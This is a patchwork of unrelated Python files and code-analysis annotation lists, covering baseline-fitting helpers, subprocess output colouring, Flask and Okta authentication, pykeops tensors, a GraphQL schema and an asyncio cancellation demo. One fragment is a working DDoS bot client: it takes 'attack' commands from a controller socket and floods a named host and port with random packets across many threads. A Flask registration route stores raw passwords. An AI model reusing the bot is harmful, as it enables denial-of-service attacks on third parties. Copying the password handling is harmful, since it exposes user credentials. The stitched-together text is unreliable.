] | [((801, 818), 'numpy.random.seed', 'np.random.seed', (['(1)'], {}), '(1)\n', (815, 818), True, 'import numpy as np\n'), ((2715, 2731), 'sklearn.preprocessing.StandardScaler', 'StandardScaler', ([], {}), '()\n', (2729, 2731), False, 'from sklearn.preprocessing import StandardScaler\n'), ((3169, 3223), 'sklearn.model_selection.train_test_split', 'train_test_split', (['X', 'y'], {'test_size': '(0.2)', 'random_state': '(42)'}), '(X, y, test_size=0.2, random_state=42)\n', (3185, 3223), False, 'from sklearn.model_selection import train_test_split\n'), ((2493, 2518), 'pandas.DataFrame', 'pd.DataFrame', (['events_data'], {}), '(events_data)\n', (2505, 2518), True, 'import pandas as pd\n'), ((2618, 2640), 'numpy.array', 'np.array', (["['top_prob']"], {}), "(['top_prob'])\n", (2626, 2640), True, 'import numpy as np\n'), ((1373, 1463), 'numpy.random.choice', 'np.random.choice', (['self.learning_data.index.values', 'self.NUM_OF_OPENED_MOVIES_PER_USER'], {}), '(self.learning_data.index.values, self.\n NUM_OF_OPENED_MOVIES_PER_USER)\n', (1389, 1463), True, 'import numpy as np\n'), ((1730, 1787), 'numpy.random.binomial', 'np.random.binomial', (['(1)', 'self.buy_probability.loc[movie_id]'], {}), '(1, self.buy_probability.loc[movie_id])\n', (1748, 1787), True, 'import numpy as np\n')] |
# -*- coding: utf-8 -*-
"""Helper functions for pybaselines.
Created on March 5, 2021
@author: <NAME>
"""
import numpy as np
# The smallest positive float value such that a + _MIN_FLOAT != a.
_MIN_FLOAT = np.finfo(float).eps
def relative_difference(old, new, norm_order=None):
    """
    Calculates the relative difference, ``norm(new - old) / norm(old)``.

    Serves as a convergence criterion in many baseline algorithms.

    Parameters
    ----------
    old : numpy.ndarray or float
        The array or single value from the previous iteration.
    new : numpy.ndarray or float
        The array or single value from the current iteration.
    norm_order : int, optional
        The type of norm to calculate. Default is None, which is the l2
        norm for arrays and the absolute value for scalars.

    Returns
    -------
    float
        The relative difference between the old and new values.

    """
    change = np.linalg.norm(new - old, norm_order)
    # Clip the denominator at the float epsilon to avoid division by zero.
    scale = np.maximum(np.linalg.norm(old, norm_order), _MIN_FLOAT)
    return change / scale
def gaussian(x, height=1.0, center=0.0, sigma=1.0):
    """
    Evaluates a gaussian distribution at *x*.

    Parameters
    ----------
    x : numpy.ndarray
        The x-values at which to evaluate the distribution.
    height : float, optional
        The maximum height of the distribution. Default is 1.0.
    center : float, optional
        The center of the distribution. Default is 0.0.
    sigma : float, optional
        The standard deviation of the distribution. Default is 1.0.

    Returns
    -------
    numpy.ndarray
        The gaussian distribution evaluated at x.

    """
    exponent = -0.5 * (x - center)**2 / sigma**2
    return height * np.exp(exponent)
def gaussian_kernel(window_size, sigma=1.0):
    """
    Creates an area-normalized gaussian kernel for convolution.

    Parameters
    ----------
    window_size : int
        The number of points for the entire kernel.
    sigma : float, optional
        The standard deviation of the gaussian model.

    Returns
    -------
    numpy.ndarray, shape (window_size,)
        The area-normalized gaussian kernel.

    Notes
    -----
    Normalizing by the sum rather than using the analytic unit-area
    gaussian keeps the kernel area exactly 1 even when
    window_size < ~ 6 * sigma.

    """
    # Sample positions centered so they run from -half_window to +half_window.
    positions = np.arange(0, window_size) - (window_size - 1) / 2
    # Unnormalized gaussian with unit height and zero center.
    kernel = np.exp(-0.5 * positions**2 / sigma**2)
    return kernel / np.sum(kernel)
def _get_edges(data, pad_length, mode='extrapolate', extrapolate_window=None, **pad_kwargs):
"""
Provides the left and right edges for padding data.
Parameters
----------
data : array-like
The array of the data.
pad_length : int
The number of points to add to the left and right edges.
mode : str, optional
The method for padding. Default is 'extrapolate'. Any method other than
'extrapolate' will use numpy.pad.
extrapolate_window : int, optional
The number of values to use for linear fitting on the left and right
edges. Default is None, which will set the extrapolate window size equal
to the `half_window` size.
**pad_kwargs
Any keyword arguments to pass to numpy.pad, which will be used if `mode`
is not 'extrapolate'.
Returns
-------
left_edge : numpy.ndarray, shape(pad_length,)
The array of data for the left padding.
right_edge : numpy.ndarray, shape(pad_length,)
The array of data for the right padding.
Notes
-----
If mode is 'extrapolate', then the left and right edges will be fit with
a first order polynomial and then extrapolated. Otherwise, uses numpy.pad.
"""
y = np.asarray(data)
if pad_length == 0:
return y
mode = mode.lower()
if mode == 'extrapolate':
if extrapolate_window is None:
extrapolate_window = 2 * pad_length + 1
x = np.arange(-pad_length, y.shape[0] + pad_length)
left_poly = np.polynomial.Polynomial.fit(
x[pad_length:-pad_length][:extrapolate_window],
y[:extrapolate_window], 1
)
right_poly = np.polynomial.Polynomial.fit(
x[pad_length:-pad_length][-extrapolate_window:],
y[-extrapolate_window:], 1
)
left_edge = left_poly(x[:pad_length])
right_edge = right_poly(x[-pad_length:])
else:
padded_data = np.pad(y, pad_length, mode, **pad_kwargs)
left_edge = padded_data[:pad_length]
right_edge = padded_data[-pad_length:]
return left_edge, right_edge
def pad_edges(data, pad_length, mode='extrapolate',
              extrapolate_window=None, **pad_kwargs):
    """
    Adds left and right edges to the data.

    Parameters
    ----------
    data : array-like
        The array of the data.
    pad_length : int
        The number of points to add to the left and right edges.
    mode : str, optional
        The method for padding. Default is 'extrapolate'. Any method other than
        'extrapolate' will use numpy.pad.
    extrapolate_window : int, optional
        The number of values to use for linear fitting on the left and right
        edges. Default is None, which will set the extrapolate window size equal
        to the `half_window` size.
    **pad_kwargs
        Any keyword arguments to pass to numpy.pad, which will be used if `mode`
        is not 'extrapolate'.

    Returns
    -------
    padded_data : numpy.ndarray, shape (N + 2 * half_window,)
        The data with padding on the left and right edges.

    Notes
    -----
    If mode is 'extrapolate', then the left and right edges will be fit with
    a first order polynomial and then extrapolated. Otherwise, uses numpy.pad.

    """
    y = np.asarray(data)
    if pad_length == 0:
        return y

    if mode.lower() != 'extrapolate':
        return np.pad(y, pad_length, mode.lower(), **pad_kwargs)

    left_edge, right_edge = _get_edges(y, pad_length, mode, extrapolate_window)
    return np.concatenate((left_edge, y, right_edge))
def padded_convolve(data, kernel, mode='reflect', **pad_kwargs):
    """
    Pads data before convolving to reduce edge effects.

    Parameters
    ----------
    data : numpy.ndarray, shape (N,)
        The data to smooth.
    kernel : numpy.ndarray, shape (M,)
        A pre-computed, normalized kernel for the convolution. Indices should
        span from -half_window to half_window.

    Returns
    -------
    numpy.ndarray, shape (N,)
        The smoothed input array.

    Notes
    -----
    Mirrors the data near the edges so that convolution does not
    produce edge effects.

    """
    # Pad by half the shorter of data/kernel so 'valid' output matches N.
    half_window = min(data.shape[0], kernel.shape[0]) // 2
    padded = pad_edges(data, half_window, mode, **pad_kwargs)
    return np.convolve(padded, kernel, mode='valid')
| [
"numpy.polynomial.Polynomial.fit",
"numpy.asarray",
"numpy.exp",
"numpy.sum",
"numpy.concatenate",
"numpy.linalg.norm",
"numpy.finfo",
"numpy.pad",
"numpy.arange"
] | [((209, 224), 'numpy.finfo', 'np.finfo', (['float'], {}), '(float)\n', (217, 224), True, 'import numpy as np\n'), ((919, 956), 'numpy.linalg.norm', 'np.linalg.norm', (['(new - old)', 'norm_order'], {}), '(new - old, norm_order)\n', (933, 956), True, 'import numpy as np\n'), ((3811, 3827), 'numpy.asarray', 'np.asarray', (['data'], {}), '(data)\n', (3821, 3827), True, 'import numpy as np\n'), ((5866, 5882), 'numpy.asarray', 'np.asarray', (['data'], {}), '(data)\n', (5876, 5882), True, 'import numpy as np\n'), ((986, 1017), 'numpy.linalg.norm', 'np.linalg.norm', (['old', 'norm_order'], {}), '(old, norm_order)\n', (1000, 1017), True, 'import numpy as np\n'), ((1713, 1758), 'numpy.exp', 'np.exp', (['(-0.5 * (x - center) ** 2 / sigma ** 2)'], {}), '(-0.5 * (x - center) ** 2 / sigma ** 2)\n', (1719, 1758), True, 'import numpy as np\n'), ((2441, 2466), 'numpy.arange', 'np.arange', (['(0)', 'window_size'], {}), '(0, window_size)\n', (2450, 2466), True, 'import numpy as np\n'), ((2545, 2557), 'numpy.sum', 'np.sum', (['gaus'], {}), '(gaus)\n', (2551, 2557), True, 'import numpy as np\n'), ((4027, 4074), 'numpy.arange', 'np.arange', (['(-pad_length)', '(y.shape[0] + pad_length)'], {}), '(-pad_length, y.shape[0] + pad_length)\n', (4036, 4074), True, 'import numpy as np\n'), ((4095, 4202), 'numpy.polynomial.Polynomial.fit', 'np.polynomial.Polynomial.fit', (['x[pad_length:-pad_length][:extrapolate_window]', 'y[:extrapolate_window]', '(1)'], {}), '(x[pad_length:-pad_length][:extrapolate_window],\n y[:extrapolate_window], 1)\n', (4123, 4202), True, 'import numpy as np\n'), ((4254, 4364), 'numpy.polynomial.Polynomial.fit', 'np.polynomial.Polynomial.fit', (['x[pad_length:-pad_length][-extrapolate_window:]', 'y[-extrapolate_window:]', '(1)'], {}), '(x[pad_length:-pad_length][-extrapolate_window:\n ], y[-extrapolate_window:], 1)\n', (4282, 4364), True, 'import numpy as np\n'), ((4522, 4563), 'numpy.pad', 'np.pad', (['y', 'pad_length', 'mode'], {}), '(y, pad_length, mode, 
**pad_kwargs)\n', (4528, 4563), True, 'import numpy as np\n'), ((6069, 6111), 'numpy.concatenate', 'np.concatenate', (['(left_edge, y, right_edge)'], {}), '((left_edge, y, right_edge))\n', (6083, 6111), True, 'import numpy as np\n')] |
import sys
import os
import subprocess
import time
import threading
class Popen(object):
    """
    Starts the subprocess with colorful output

    Arguments:
        command: The command
        prefix: The prefix to print before every line
        color: The color escape code
    """
    def __init__(self, command, prefix = '', color = ''):
        # stdout lines are echoed with the caller's prefix/color; stderr lines
        # use the same prefix but are always shown in red so errors stand out.
        self._process = subprocess.Popen(command, stdout=PrefixStdoutPipe(prefix, color), stderr=PrefixStdoutPipe(prefix, colors.fg.red))
    def getProcess(self):
        # Expose the underlying subprocess.Popen for callers needing wait()/poll().
        return self._process
    def terminate(self):
        # Forward termination to the wrapped subprocess.
        self._process.terminate()
class PrefixStdoutPipe(threading.Thread):
    """Reader thread that echoes every line written to its pipe with a colored prefix.

    An instance can be passed as ``stdout=``/``stderr=`` to ``subprocess.Popen``
    because it exposes ``fileno()``.
    """
    def __init__(self, prefix, color = ''):
        self._color = color
        self._prefix = prefix
        # The subprocess writes into _writepipe; run() reads from _readpipe.
        self._readpipe, self._writepipe = os.pipe()
        super().__init__()
    def fileno(self):
        # Called by subprocess when this object is used as a stream target;
        # starting the reader thread here means it runs exactly when attached.
        self.start()
        return self._writepipe
    def finished(self):
        # Close the write end so readline() in run() sees EOF and the thread exits.
        os.close(self._writepipe)
    def run(self):
        # Read line by line until EOF, printing each with the color + prefix
        # and a trailing color reset.
        inputFile = os.fdopen(self._readpipe)
        while True:
            line = inputFile.readline()
            if len(line) == 0:
                break
            print(self._color, self._prefix, line.strip(), colors.reset, sep='')
class colors:
    """ANSI escape sequences for terminal text styling."""
    reset='\033[0m'
    bold='\033[01m'
    disable='\033[02m'
    underline='\033[04m'
    reverse='\033[07m'
    strikethrough='\033[09m'
    invisible='\033[08m'
    class fg:
        # Foreground (text) colors.
        black='\033[30m'
        red='\033[31m'
        green='\033[32m'
        orange='\033[33m'
        blue='\033[34m'
        purple='\033[35m'
        cyan='\033[36m'
        lightgrey='\033[37m'
        darkgrey='\033[90m'
        lightred='\033[91m'
        lightgreen='\033[92m'
        yellow='\033[93m'
        lightblue='\033[94m'
        pink='\033[95m'
        lightcyan='\033[96m'
    # NOTE(review): this method calls self.is_alive(), which ``colors`` does
    # not define — it looks misplaced and probably belongs on
    # PrefixStdoutPipe (a threading.Thread subclass); confirm before use.
    def eof(self):
        '''Check whether there is no more content to expect.'''
        return not self.is_alive()
if __name__ == '__main__':
    command = "ping www.heise.de -c 5".split(" ")
    # Route the subprocess' stdout through a PrefixStdoutPipe so every line
    # is printed with a colored prefix.  The original code referenced an
    # undefined name ``process`` (NameError) and passed a stream argument
    # that PrefixStdoutPipe.__init__(prefix, color) does not accept.
    stdout_reader = PrefixStdoutPipe("ping: ", colors.fg.red)
    ping_process = subprocess.Popen(command, stdout=stdout_reader)
    print("Hello, world!")
    time.sleep(5)
    print("End")
    # Close our write end so the reader thread sees EOF, then join it tidily.
    stdout_reader.finished()
    stdout_reader.join()
    ping_process.terminate()
| [
"os.close",
"subprocess.Popen",
"time.sleep",
"os.fdopen",
"os.pipe"
] | [((2079, 2128), 'subprocess.Popen', 'subprocess.Popen', (['command'], {'stdout': 'subprocess.PIPE'}), '(command, stdout=subprocess.PIPE)\n', (2095, 2128), False, 'import subprocess\n'), ((2265, 2278), 'time.sleep', 'time.sleep', (['(5)'], {}), '(5)\n', (2275, 2278), False, 'import time\n'), ((811, 820), 'os.pipe', 'os.pipe', ([], {}), '()\n', (818, 820), False, 'import os\n'), ((956, 981), 'os.close', 'os.close', (['self._writepipe'], {}), '(self._writepipe)\n', (964, 981), False, 'import os\n'), ((1022, 1047), 'os.fdopen', 'os.fdopen', (['self._readpipe'], {}), '(self._readpipe)\n', (1031, 1047), False, 'import os\n')] |
from flask import Blueprint, request, jsonify
from api.models.user_model import User, UserPasswords, db
from flask_bcrypt import Bcrypt
user_bp = Blueprint('user_bp', __name__)
def validate_register_fields(req):
    """Return True when the request body is JSON containing every registration field.

    ``get_json(silent=True)`` yields None for a missing or malformed JSON
    body; the original code then raised TypeError on ``f not in data``.
    That case now simply fails validation.
    """
    data = req.get_json(silent=True)
    if data is None:
        return False
    required = ('first_name', 'last_name', 'email', 'password')
    return all(field in data for field in required)
@user_bp.route('/test', methods=['POST'])
def test():
    """Debug endpoint: reports whether the posted body passes registration validation."""
    is_valid = validate_register_fields(request)
    return f'{is_valid}'
@user_bp.route('/register', methods=['POST'])
def register():
    """Create a user and its password record from a JSON registration payload.

    Returns the serialized user with 201 on success, a 400 JSON error when
    required fields are missing, or the raw exception text on DB failure.
    """
    if validate_register_fields(request):
        data = request.get_json(silent=True)
        first_name = data['first_name']
        last_name = data['last_name']
        email = data['email']
        # NOTE(review): the raw password is stored directly as the "digest";
        # Bcrypt is imported by this module but never applied here — confirm
        # hashing happens elsewhere (e.g. in the UserPasswords model).
        digest = data['password']
        user = User(
            first_name=first_name,
            last_name=last_name,
            email=email,
        )
        try:
            db.session.add(user)
            # Commit first so user.id is assigned for the password row below.
            db.session.commit()
        except Exception as e:
            # NOTE(review): returns the exception text with an implicit 200
            # status — consider an error status code; left unchanged here.
            return(str(e))
        try:
            user_pw = UserPasswords(
                user_id=user.id,
                digest=digest
            )
            db.session.add(user_pw)
            db.session.commit()
            return jsonify(user.serialize()), 201
        except Exception as e:
            return str(e)
    else:
        return jsonify(error='missing required fields with a hot reload!'), 400
| [
"api.models.user_model.User",
"api.models.user_model.db.session.add",
"api.models.user_model.db.session.commit",
"flask.request.get_json",
"api.models.user_model.UserPasswords",
"flask.Blueprint",
"flask.jsonify"
] | [((146, 176), 'flask.Blueprint', 'Blueprint', (['"""user_bp"""', '__name__'], {}), "('user_bp', __name__)\n", (155, 176), False, 'from flask import Blueprint, request, jsonify\n'), ((628, 657), 'flask.request.get_json', 'request.get_json', ([], {'silent': '(True)'}), '(silent=True)\n', (644, 657), False, 'from flask import Blueprint, request, jsonify\n'), ((816, 877), 'api.models.user_model.User', 'User', ([], {'first_name': 'first_name', 'last_name': 'last_name', 'email': 'email'}), '(first_name=first_name, last_name=last_name, email=email)\n', (820, 877), False, 'from api.models.user_model import User, UserPasswords, db\n'), ((950, 970), 'api.models.user_model.db.session.add', 'db.session.add', (['user'], {}), '(user)\n', (964, 970), False, 'from api.models.user_model import User, UserPasswords, db\n'), ((983, 1002), 'api.models.user_model.db.session.commit', 'db.session.commit', ([], {}), '()\n', (1000, 1002), False, 'from api.models.user_model import User, UserPasswords, db\n'), ((1097, 1142), 'api.models.user_model.UserPasswords', 'UserPasswords', ([], {'user_id': 'user.id', 'digest': 'digest'}), '(user_id=user.id, digest=digest)\n', (1110, 1142), False, 'from api.models.user_model import User, UserPasswords, db\n'), ((1201, 1224), 'api.models.user_model.db.session.add', 'db.session.add', (['user_pw'], {}), '(user_pw)\n', (1215, 1224), False, 'from api.models.user_model import User, UserPasswords, db\n'), ((1237, 1256), 'api.models.user_model.db.session.commit', 'db.session.commit', ([], {}), '()\n', (1254, 1256), False, 'from api.models.user_model import User, UserPasswords, db\n'), ((1390, 1449), 'flask.jsonify', 'jsonify', ([], {'error': '"""missing required fields with a hot reload!"""'}), "(error='missing required fields with a hot reload!')\n", (1397, 1449), False, 'from flask import Blueprint, request, jsonify\n')] |
import subprocess
import threading
import time
import socket
import os, sys, random
while True:
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
host = '127.0.0.1'
port = 9998
s.connect((host, port))
def ddos(*args):
def dos(*args):
t1=time.time()
print("started")
host=args[1]
port=args[2]
if args[0] == "udp":
s=socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
else:
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
bytes=random._urandom(10240)
s.connect((host, int(port)))
send=0
while True:
if not run:
break
s.sendto(bytes, (host,int(port)))
send+=1
#print(str(send)+" Packets Sended Sucessful")
s.close()
print("run time {}".format(time.time()-t1))
print(args)
global run
for n in range(int(args[4])):
threading.Thread(target = dos,args=[*args]).start()
time.sleep(int(args[3]))
run=False
while True:
global run
data = s.recv(1024)
data=data[:].decode("utf-8")
data=data.lower()
if "attack" in data:
s.send(str.encode("done"))
data=data.replace("attack ","")
data=data.split()
run=True
threading.Thread(target = ddos,args=data).start()
elif "kill" in data:
print("here")
run=False
s.send(str.encode("Server Stopped"))
elif "ping" in data:
s.send(str.encode("Pong"))
else:
s.send(str.encode("ERROR"))
except:
continue
| [
"threading.Thread",
"random._urandom",
"time.time",
"socket.socket"
] | [((124, 173), 'socket.socket', 'socket.socket', (['socket.AF_INET', 'socket.SOCK_STREAM'], {}), '(socket.AF_INET, socket.SOCK_STREAM)\n', (137, 173), False, 'import socket\n'), ((331, 342), 'time.time', 'time.time', ([], {}), '()\n', (340, 342), False, 'import time\n'), ((660, 682), 'random._urandom', 'random._urandom', (['(10240)'], {}), '(10240)\n', (675, 682), False, 'import os, sys, random\n'), ((495, 543), 'socket.socket', 'socket.socket', (['socket.AF_INET', 'socket.SOCK_DGRAM'], {}), '(socket.AF_INET, socket.SOCK_DGRAM)\n', (508, 543), False, 'import socket\n'), ((587, 636), 'socket.socket', 'socket.socket', (['socket.AF_INET', 'socket.SOCK_STREAM'], {}), '(socket.AF_INET, socket.SOCK_STREAM)\n', (600, 636), False, 'import socket\n'), ((1194, 1236), 'threading.Thread', 'threading.Thread', ([], {'target': 'dos', 'args': '[*args]'}), '(target=dos, args=[*args])\n', (1210, 1236), False, 'import threading\n'), ((1663, 1703), 'threading.Thread', 'threading.Thread', ([], {'target': 'ddos', 'args': 'data'}), '(target=ddos, args=data)\n', (1679, 1703), False, 'import threading\n'), ((1068, 1079), 'time.time', 'time.time', ([], {}), '()\n', (1077, 1079), False, 'import time\n')] |
from functools import wraps
from base64 import b64encode
from jose import jwt
from flask import Flask, jsonify, request, _app_ctx_stack, json
import requests
ALGORITHMS = ["RS256"]
SCOPES = 'username' # Custom scopes that you want to pass as part of the request when requesting access token
AUTH_SERVER_ID = 'YOUR_OKTA_AUTH_SERVER_ID' # Replace with your okta authroziation server id
AUTH_SERVER_DOMAIN = 'YOUR_OKTA_DOMAIN' # Replace with your okta org
AUTH_DOMAIN_ENDPOINT = '{}/oauth2/{}'.format(AUTH_SERVER_DOMAIN, AUTH_SERVER_ID)
API_AUDIENCE = 'http://localhost:5000/' # whatever your API domain is called and should be added as audience to the API
def handle_error(error, status_code):
    """Build a JSON response from *error* and attach *status_code* to it."""
    response = jsonify(error)
    response.status_code = status_code
    return response
def get_access_token(url, headers, data):
    """POST the token request form to *url* and return the raw requests.Response."""
    return requests.post(url, headers=headers, data=data)
def get_token_auth_header():
    """Obtains the access token from the Authorization Header

    Expects ``Authorization: Bearer <token>`` and returns the token string.
    NOTE(review): on malformed headers this returns the Flask error Response
    from handle_error() instead of raising — callers such as requires_scope()
    pass that Response on to jwt.get_unverified_claims(); confirm intended.
    """
    auth = request.headers.get("Authorization", None)
    if not auth:
        return handle_error({"code": "authorization_header_missing",
                            "description":
                                "Authorization header is expected"}, 401)
    parts = auth.split()
    # The scheme must be exactly "Bearer" (case-insensitive), with one token.
    if parts[0].lower() != "bearer":
        return handle_error({"code": "invalid_header",
                            "description":
                                "Authorization header must start with"
                                "Bearer"}, 401)
    elif len(parts) == 1:
        return handle_error({"code": "invalid_header",
                            "description": "Token not found"}, 401)
    elif len(parts) > 2:
        return handle_error({"code": "invalid_header",
                            "description": "Authorization header must be"
                            "Bearer token"}, 401)
    token = parts[1]
    return token
def requires_scope(required_scope):
    """Determines if the required scope is present in the access token

    Args:
        required_scope (str): The scope required to access the resource
    """
    token = get_token_auth_header()
    # The 'scp' claim is inspected without signature verification here;
    # requires_auth() performs the actual validation.
    claims = jwt.get_unverified_claims(token)
    return any(scope == required_scope for scope in claims["scp"])
def requires_auth(f):
    """Determines if the access token is valid

    Decorator: fetches the JWKS from the authorization server, verifies the
    request's bearer token (signature, audience, issuer, expiry) and stores
    the decoded claims on the app context before calling *f*.
    """
    @wraps(f)
    def decorated(*args, **kwargs):
        token = get_token_auth_header()
        # Fetch the signing keys (JWKS) from the authorization server.
        # NOTE(review): fetched on every request — consider caching.
        jsonurl = requests.get("{}/v1/keys".format(AUTH_DOMAIN_ENDPOINT))
        jwks = jsonurl.json()
        try:
            unverified_header = jwt.get_unverified_header(token)
        except jwt.JWTError:
            # token may also be an error Response from get_token_auth_header();
            # in either case it is returned to the client as-is.
            return token
        # Select the JWKS key whose key id matches the token header's kid.
        rsa_key = {}
        for key in jwks["keys"]:
            if key["kid"] == unverified_header["kid"]:
                rsa_key = {
                    "kty": key["kty"],
                    "kid": key["kid"],
                    "use": key["use"],
                    "n": key["n"],
                    "e": key["e"]
                }
        if rsa_key:
            try:
                # Full verification: signature, audience, and issuer.
                payload = jwt.decode(
                    token,
                    rsa_key,
                    algorithms=ALGORITHMS,
                    audience=API_AUDIENCE,
                    issuer=AUTH_DOMAIN_ENDPOINT
                )
            except jwt.ExpiredSignatureError:
                return handle_error({"code": "token_expired",
                                    "description": "token is expired"}, 401)
            except jwt.JWTClaimsError:
                return handle_error({"code": "invalid_claims",
                                    "description": "incorrect claims,"
                                    "please check the audience and issuer"}, 401)
            except Exception:
                return handle_error({"code": "invalid_header",
                                    "description": "Unable to parse authentication"
                                    "token."}, 400)
            # Expose the verified claims to the wrapped view via the app context.
            _app_ctx_stack.top.current_user = payload
            return f(*args, **kwargs)
        return handle_error({"code": "invalid_header",
                            "description": "Unable to find appropriate key"}, 400)
    return decorated
def generate_basic_auth(cred_dict):
    """Builds the HTTP Basic auth headers for a token request.

    Args:
        cred_dict: mapping with 'client_id' and 'client_secret' keys.

    Returns:
        A headers dict containing the Basic Authorization entry, or None
        when either credential is missing.
    """
    username = cred_dict.get('client_id')
    password = cred_dict.get('client_secret')
    if not (username and password):
        return None
    # bytes(str) without an encoding raises TypeError on Python 3, so the
    # original always crashed here; encode explicitly before base64-encoding.
    credentials = '{}:{}'.format(username, password).encode('utf-8')
    basic_auth = b64encode(credentials).decode('ascii')
    return {'Accept': 'application/json',
            'content-type': 'application/x-www-form-urlencoded',
            'Authorization': 'Basic ' + basic_auth }
def get_oauth_body_client_credentials():
    """Return the form body for an OAuth2 client-credentials token request."""
    return "grant_type=client_credentials&scope={}".format(SCOPES)
def get_oauth_body_password(cred_dict):
    """Return the form body for an OAuth2 resource-owner-password token request.

    Missing 'username'/'password' keys default to empty strings, matching
    the original behavior.
    """
    username = cred_dict.get('username', '')
    password = cred_dict.get('password', '')
    return "grant_type=password&username={}&password={}&scope={}".format(username, password, SCOPES)
"requests.post",
"jose.jwt.decode",
"functools.wraps",
"jose.jwt.get_unverified_claims",
"jose.jwt.get_unverified_header",
"flask.request.headers.get",
"flask.jsonify"
] | [((705, 719), 'flask.jsonify', 'jsonify', (['error'], {}), '(error)\n', (712, 719), False, 'from flask import Flask, jsonify, request, _app_ctx_stack, json\n'), ((822, 868), 'requests.post', 'requests.post', (['url'], {'headers': 'headers', 'data': 'data'}), '(url, headers=headers, data=data)\n', (835, 868), False, 'import requests\n'), ((993, 1035), 'flask.request.headers.get', 'request.headers.get', (['"""Authorization"""', 'None'], {}), "('Authorization', None)\n", (1012, 1035), False, 'from flask import Flask, jsonify, request, _app_ctx_stack, json\n'), ((2193, 2225), 'jose.jwt.get_unverified_claims', 'jwt.get_unverified_claims', (['token'], {}), '(token)\n', (2218, 2225), False, 'from jose import jwt\n'), ((2473, 2481), 'functools.wraps', 'wraps', (['f'], {}), '(f)\n', (2478, 2481), False, 'from functools import wraps\n'), ((2707, 2739), 'jose.jwt.get_unverified_header', 'jwt.get_unverified_header', (['token'], {}), '(token)\n', (2732, 2739), False, 'from jose import jwt\n'), ((3198, 3303), 'jose.jwt.decode', 'jwt.decode', (['token', 'rsa_key'], {'algorithms': 'ALGORITHMS', 'audience': 'API_AUDIENCE', 'issuer': 'AUTH_DOMAIN_ENDPOINT'}), '(token, rsa_key, algorithms=ALGORITHMS, audience=API_AUDIENCE,\n issuer=AUTH_DOMAIN_ENDPOINT)\n', (3208, 3303), False, 'from jose import jwt\n')] |
from app import create_app, db
app = create_app()
@app.shell_context_processor
def make_shell_context():
    """Expose the app and database handles in the ``flask shell`` namespace."""
    return {'app': app, 'db': db}
| [
"app.create_app"
] | [((38, 50), 'app.create_app', 'create_app', ([], {}), '()\n', (48, 50), False, 'from app import create_app, db\n')] |
import numpy as np
from pykeops.common.lazy_tensor import GenericLazyTensor
from pykeops.numpy.utils import numpytools
# Convenient aliases:
def Var(x_or_ind, dim=None, cat=None):
    """Create a :class:`LazyTensor`, either from data or from a symbolic triplet.

    When *dim* is None, *x_or_ind* is treated as actual data and *cat*
    selects the variable axis; otherwise ``(x_or_ind, dim, cat)`` describes
    a symbolic variable by its (index, dimension, category).
    """
    if dim is None:
        return LazyTensor(x_or_ind, axis=cat)
    return LazyTensor((x_or_ind, dim, cat))
def Vi(x_or_ind, dim=None):
    r"""Shorthand for a :class:`LazyTensor` variable of category 0 (i-indexed)."""
    return Var(x_or_ind, dim, cat=0)
def Vj(x_or_ind, dim=None):
    r"""Shorthand for a :class:`LazyTensor` variable of category 1 (j-indexed)."""
    return Var(x_or_ind, dim, cat=1)
def Pm(x_or_ind, dim=None):
    r"""Shorthand for a :class:`LazyTensor` variable of category 2 (parameter)."""
    return Var(x_or_ind, dim, cat=2)
class LazyTensor(GenericLazyTensor):
    r"""Symbolic wrapper for NumPy arrays.

    :class:`LazyTensor` encode numerical arrays through the combination
    of a symbolic, **mathematical formula** and a list of **small data arrays**.
    They can be used to implement efficient algorithms on objects
    that are **easy to define**, but **impossible to store** in memory
    (e.g. the matrix of pairwise distances between
    two large point clouds).

    :class:`LazyTensor` may be created from standard NumPy arrays or PyTorch tensors,
    combined using simple mathematical operations and converted
    back to NumPy arrays or PyTorch tensors with
    efficient reduction routines, which outperform
    standard tensorized implementations by two orders of magnitude.
    """

    def __init__(self, x=None, axis=None):
        super().__init__(x=x, axis=axis)

        # NumPy-specific input validation on top of the generic constructor.
        typex = type(x)

        if (
            typex
            not in [type(None), tuple, int, float, list, np.ndarray] + self.float_types
        ):
            raise TypeError(
                "LazyTensors should be built from NumPy arrays, "
                "float/integer numbers, lists of floats or 3-uples of "
                "integers. Received: {}".format(typex)
            )

        if typex in self.float_types:  # NumPy scalar -> NumPy array
            x = np.array(x).reshape(1)

        if typex == np.ndarray:
            # Derive the inner dimension (and possibly the axis) from the data.
            self.infer_dim(x, axis)

    def get_tools(self):
        # Bind the NumPy backend helpers used by the generic base class.
        self.tools = numpytools
        self.Genred = numpytools.Genred
        self.KernelSolve = numpytools.KernelSolve

    def lt_constructor(self, x=None, axis=None):
        # Factory used by the base class so operations return this subclass.
        return LazyTensor(x=x, axis=axis)

    # NumPy scalar types accepted as 0-d inputs; referenced via
    # self.float_types in __init__ above.
    float_types = [float, np.float16, np.float32, np.float64]
"numpy.array"
] | [((2288, 2299), 'numpy.array', 'np.array', (['x'], {}), '(x)\n', (2296, 2299), True, 'import numpy as np\n')] |
from django.contrib import admin
from .models import ColorAlias
admin.site.register(ColorAlias)
| [
"django.contrib.admin.site.register"
] | [((66, 97), 'django.contrib.admin.site.register', 'admin.site.register', (['ColorAlias'], {}), '(ColorAlias)\n', (85, 97), False, 'from django.contrib import admin\n')] |
#! /usr/bin/env python3
# -*- encoding: utf-8 -*-
"""
schema object
schema
"""
__author__ = '<NAME> <<EMAIL>>'
__version__ = '1.0.0'
__date__ = '2019-12-02'
import graphene
from app.gql.query import Query
from app.gql.mutation import Mutation
schema = graphene.Schema(query=Query, mutation=Mutation)
| [
"graphene.Schema"
] | [((253, 300), 'graphene.Schema', 'graphene.Schema', ([], {'query': 'Query', 'mutation': 'Mutation'}), '(query=Query, mutation=Mutation)\n', (268, 300), False, 'import graphene\n')] |
# -*- coding: utf-8 -*-
"""
@contact: <EMAIL>
@time: 2019/3/25 下午9:43
"""
import asyncio
async def consume():
    """Simulated consumer: logs start, idles for 10 s (a cancellation point), logs end."""
    print('start consume...')
    await asyncio.sleep(10)
    print('end consume...')
if __name__ == '__main__':
    # Run ten consumers concurrently; Ctrl-C demonstrates task cancellation.
    tasks = [consume() for i in range(10)]
    loop = asyncio.get_event_loop()
    try:
        loop.run_until_complete(asyncio.wait(tasks))
    except KeyboardInterrupt as e:
        # Cancel every still-pending task, then spin the loop once more so
        # the CancelledErrors are actually delivered before closing.
        all = asyncio.Task.all_tasks()
        for t in all:
            print('cancel task')
            print(t.cancel())
        loop.stop()
        loop.run_forever()
    finally:
        loop.close()
"""
lishulongdeMBP:event_loop lishulong$ python cancel_task.py
start consume...
start consume...
start consume...
start consume...
